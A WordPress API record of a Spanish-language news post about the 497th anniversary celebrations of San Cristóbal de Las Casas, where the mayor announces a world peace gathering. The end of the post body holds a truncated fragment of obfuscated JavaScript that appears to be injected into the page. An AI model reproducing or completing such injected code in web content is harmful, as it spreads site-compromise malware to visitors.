{"id":21194,"date":"2025-04-01T16:47:35","date_gmt":"2025-04-01T16:47:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21194"},"modified":"2025-04-01T16:47:35","modified_gmt":"2025-04-01T16:47:35","slug":"rumbo-a-los-500-anos-de-la-fundacion-de-san-cristobal-de-las-casas-anuncia-fabiola-ricci-la-realizacion-del-encuentro-mundial-por-la-paz-y-la-tierra","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21194","title":{"rendered":"Rumbo a los 500 a\u00f1os de la fundaci\u00f3n de San Crist\u00f3bal de Las Casas, anuncia Fabiola Ricci la realizaci\u00f3n del Encuentro Mundial por la Paz y la Tierra"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"21195\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1-1024x768.jpg\" alt=\"\" class=\"wp-image-21195\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0006-1.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21196\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-1024x682.jpg\" alt=\"\" class=\"wp-image-21196\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0005.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21198\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-1024x682.jpg\" alt=\"\" class=\"wp-image-21198\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0004.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21197\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-1024x682.jpg\" alt=\"\" class=\"wp-image-21197\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0003.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21199\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-1024x682.jpg\" alt=\"\" class=\"wp-image-21199\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250401-WA0002.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 31 de marzo de 2025.- Miles de ciudadanos de San Crist\u00f3bal de Las Casas se unieron a los festejos por el 497 aniversario de la fundaci\u00f3n de la ciudad. La presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 estos festejos, haciendo un llamado a la unidad y al compromiso ciudadano en el camino hacia los 500 a\u00f1os de la ciudad.<\/p>\n\n\n\n<p>Durante su discurso, destac\u00f3 la importancia de construir un municipio m\u00e1s justo, limpio y ordenado, enfatizando que la historia no solo debe ser recordada, sino transformada. En este contexto, anunci\u00f3 la realizaci\u00f3n del 2Encuentro Mundial por la Paz y la Tierra\u201d, una iniciativa que reunir\u00e1 a invitados locales, nacionales e internacionales con el objetivo de fortalecer el esp\u00edritu de convivencia y armon\u00eda de San Crist\u00f3bal.<\/p>\n\n\n\n<p>\u201cSan Crist\u00f3bal no solo se conmemora, se construye, se teje, se defiende y se sue\u00f1a\u201d, expres\u00f3 la presidenta ante una multitud que celebr\u00f3 con entusiasmo la identidad y riqueza cultural del municipio en estos 497 a\u00f1os.<\/p>\n\n\n\n<p>\u201cExtendemos la invitaci\u00f3n a todo el pueblo, porque todos somos parte de San Crist\u00f3bal. Este encuentro no ser\u00eda completo sin su gente, sin su comunidad y sin su voz. A quienes hoy est\u00e1n aqu\u00ed, les propongo que, en este 497 aniversario, no solo sea un festejo, sino un punto de partida, un llamado a la acci\u00f3n, una promesa p\u00fablica y una responsabilidad compartida. Que, cuando llegue el 31 de marzo de 2028, podamos decir con la frente en alto: no solo celebramos 500 a\u00f1os de historia, sino que lo hicimos valer a trav\u00e9s del esfuerzo. Porque no se trata de recordar lo que fuimos, se trata de atrevernos a ser mejor cada d\u00eda\u201d, destac\u00f3.<\/p>\n\n\n\n<p>Durante este significativo aniversario, se present\u00f3 la Marimba Municipal en el MUSAC, junto con una serie de conciertos. Tambi\u00e9n se present\u00f3 una canci\u00f3n y varios videos alusivos a los 500 a\u00f1os de la fundaci\u00f3n de San Crist\u00f3bal. Uno de los momentos m\u00e1s emocionantes fue la inauguraci\u00f3n de la cuenta regresiva rumbo a los 500 a\u00f1os, evento que se cerr\u00f3 con un Show de Danza Prehisp\u00e1nica Maya.<\/p>\n\n\n\n<p>En punto de las 8 de la noche, como estaba programado, se realiz\u00f3 el concierto \u201cEl Llamado de las Campanadas\u201d, en el que participaron los campanarios de todas las iglesias de la ciudad de manera simult\u00e1nea. Para cerrar la jornada, se realiz\u00f3 un Show de fuegos pirot\u00e9cnicos.<\/p>\n\n\n\n<p>Durante las actividades, se hizo la premiaci\u00f3n y entrega de reconocimientos a los participantes en la exposici\u00f3n de maquetas de la ciudad, con representaciones de diversas universidades de San Crist\u00f3bal y de Tuxtla Guti\u00e9rrez. Estas maquetas reflejan la arquitectura hist\u00f3rica y cultural de San Crist\u00f3bal, destacando monumentos emblem\u00e1ticos como la Iglesia de Santo Domingo, la Iglesia de Guadalupe, La Merced y muchos otros.<\/p>\n\n\n\n<p>Otro de los momentos destacados fue la exposici\u00f3n de tapetes de arte popular elaborados por estudiantes de varias preparatorias y universidades, como la Preparatoria No. 2, la Preparatoria Mesoamericana y la Universidad Aut\u00f3noma de Chiapas, entre otras, montadas en la Plaza Catedral.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 31 de marzo de 2025.- Miles de ciudadanos de San Crist\u00f3bal de Las Casas se unieron a los festejos por el 497 aniversario de la fundaci\u00f3n de la ciudad. La presidenta municipal, Mtra. Fabiola Ricci Diestel, encabez\u00f3 estos festejos, haciendo un llamado a la unidad y al compromiso ciudadano &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21198,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21194","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21194","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21194"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21194\/revisions"}],"predecessor-version":[{"id":21200,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21194\/revisions\/21200"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21198"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21194"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21194"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}